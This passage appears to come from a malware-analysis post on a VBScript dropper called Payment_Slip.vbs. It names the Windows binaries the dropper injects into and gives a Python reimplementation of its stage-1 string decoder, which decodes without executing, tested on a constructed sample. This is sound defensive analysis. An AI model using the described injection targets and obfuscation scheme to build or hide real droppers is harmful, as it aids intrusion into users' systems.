Remember, in this script the host_file is:

"%windir%\system32\svchost.exe" if the .NET Framework is NOT installed,
else: "%windir%\microsoft.net\framework\v2.0.50727\msbuild.exe"
C++ :

LRESULT WINAPI CallWindowProc(
_In_ WNDPROC lpPrevWndFunc,
_In_ HWND hWnd,
_In_ UINT Msg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
);
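
As an added example (not part of the post above), here is the stage-1 decoder of section 2) reimplemented in Python, with the For/Next stride emulated literally rather than assumed. The function names, the comment stripper and the sample script are my own; the sample string is built with a small encoder, because the real 1,651,672-character string is not reproduced on the page.

```python
"""Stage-1 deobfuscation of the Payment_Slip.vbs dropper (added example)."""
import re

# One record of the obfuscated string: a decimal char code padded with '-'.
# 22 = the 21 added inside the loop body + the 1 added by Next.
RECORD_LEN = 22


def strip_vbs_comments(script: str) -> str:
    """Remove the fake comments: cut each line at the first ' that is
    outside a "..." literal, and drop the lines that become empty."""
    cleaned = []
    for line in script.splitlines():
        in_string = False
        for pos, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                line = line[:pos]
                break
        if line.strip():
            cleaned.append(line.rstrip())
    return "\n".join(cleaned)


def vbs_stage1_encode(text: str) -> str:
    """Inverse of the dropper's decoder, used only to build test input."""
    return "".join(str(ord(c)).ljust(RECORD_LEN, "-") for c in text)


def vbs_stage1_decode(blob: str) -> str:
    """Emulate CLHHFSRSPXGUHEQJ step by step, 1-based like VBScript's Mid()."""
    out = []
    i = 1
    while i <= len(blob):                                # For i = 1 To Len(blob)
        record = blob[i - 1:i + 2].replace("-", "")      # Replace(Mid(blob, i, 3), "-", "")
        if not record:                                   # ran off the end of a truncated dump
            break
        out.append(chr(int(record)))                     # Chr("13") -> "\r"
        i += 21                                          # BSBPIFYBTESIP = BSBPIFYBTESIP + 21
        i += 1                                           # ... and Next adds the Step (1)
    return "".join(out)


ASSIGN_RE = re.compile(r'(\w+)\s*=\s*"([\d-]+)"')
EXECUTE_RE = re.compile(r"Execute\s*\(\s*\w+\s*\(\s*(\w+)\s*\)\s*\)", re.IGNORECASE)


def deobfuscate_stage1(script: str) -> str:
    """Find the Execute(func(var)) call, the string assigned to var, decode it."""
    cleaned = strip_vbs_comments(script)
    call = EXECUTE_RE.search(cleaned)
    if call is None:
        raise ValueError("no Execute(func(var)) call found")
    target = call.group(1)
    for name, blob in ASSIGN_RE.findall(cleaned):
        if name == target:
            return vbs_stage1_decode(blob)
    raise ValueError("no obfuscated string assigned to " + target)


# Constructed test input shaped like the real dropper; the plaintext is the
# beginning of the decoded script as shown in the post.
STAGE2_PLAINTEXT = '\r\n\'=-=-=-=-= CONFIG =-=-=-=\r\nHOST_FILE = "system32\\Svchost.exe"'
SAMPLE_SCRIPT = (
    "'junk)%(fake comment with a \" inside\r\n"
    "dim SUNVBCGETVG 'more junk\r\n"
    'SUNVBCGETVG = "' + vbs_stage1_encode(STAGE2_PLAINTEXT) + '"\r\n'
    "Execute (CLHHFSRSPXGUHEQJ(SUNVBCGETVG)) '!!junk\r\n"
)

if __name__ == "__main__":
    print(deobfuscate_stage1(SAMPLE_SCRIPT))
```

Feed deobfuscate_stage1 the raw .vbs text and print the result instead of running it; the decoder never evaluates anything, which is the whole point of replacing Execute with a reimplementation.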
 